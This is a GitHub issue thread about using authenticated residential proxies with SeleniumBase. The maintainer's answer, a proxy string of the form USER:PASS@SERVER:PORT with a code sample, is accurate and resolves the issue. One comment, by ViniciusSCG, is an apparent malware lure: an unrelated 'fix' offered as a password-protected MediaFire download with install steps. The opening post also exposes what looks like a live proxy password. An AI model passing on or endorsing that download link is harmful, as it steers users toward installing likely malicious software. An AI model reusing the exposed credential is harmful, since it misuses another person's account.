### ISSUE TITLE
Unable to use Residential proxies.

### ISSUE THREAD

**Issue by immortal-stem** [mdmintz/seleniumbase-examples#5]
Am trying to use residential proxies with seleniumbase. They come in the form of hostname:port:username:password
e.g. proxy.iproyal.com:8082:usernameString:0qMspCfWtAFErhA9_country-us_session-SyrZinpW_lifetime-1h.
Please guide me on how to use this. I am using the SB format.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mdmintz** [comment]
You can add `proxy="USER:PASS@SERVER:PORT"` or `proxy="SERVER:PORT"`. Eg:

```python
from seleniumbase import SB

with SB(proxy="USER:PASS@SERVER:PORT") as sb:
    #   ...
```

**Comment by immortal-stem** [comment]
Thanks so much @mdmintz, it works and I appreciate you!
